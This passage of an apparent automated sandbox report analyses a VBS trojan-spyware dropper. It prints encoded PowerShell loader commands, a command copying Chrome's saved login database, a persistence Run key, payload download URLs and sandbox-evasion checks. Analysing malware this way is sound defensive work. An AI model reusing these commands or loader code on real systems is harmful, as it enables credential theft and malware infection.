C4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP"
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220121Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\blueb.datJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@14/16@4/1
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\New _Inquiry P.O4622.vbs"
      Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogri.iniJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp, svchost.exe
      Source: Binary string: svchost.pdb source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp
      Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBMAEEAQwBUAEkARgBFA", "", "", "0")
      Source: Yara matchFile source: 00000013.00000000.950104658.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0493203F push eax; iretd
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA3D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0327D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA842 push edx; retf
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DC883 push 00000038h; retf
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006C63D7 push 00000019h; ret
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DD4B5 push eax; ret
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DD56C push eax; ret
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DD50B push eax; ret
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DD502 push eax; ret
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006D9FB6 push es; iretd
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dllJump to dropped file

      Boot Survival

      barindex
      Source: C:\Windows\SysWOW64\svchost.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run DDFDTFWPJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE0
      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: Initial fileInitial file: For i = 1 To len(h) step 2 if i mod 21 = 0 then Wscript.Sleep(1)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
      Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpBinary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://OWANLAB.COM/BIN_DZIINE252.BINHTTPS://GSMSERVICE.TECH/BIN_DZIINE252.BIN
      Source: powershell.exe, 0000000D.00000003.948189598.0000000007A86000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1026417858.0000000007A80000.00000004.00000001.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE~
      Source: powershell.exe, 0000000D.00000002.1026909764.0000000007B1D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947961634.0000000007B16000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947999087.0000000007B1C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000006C9904 second address: 00000000006C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
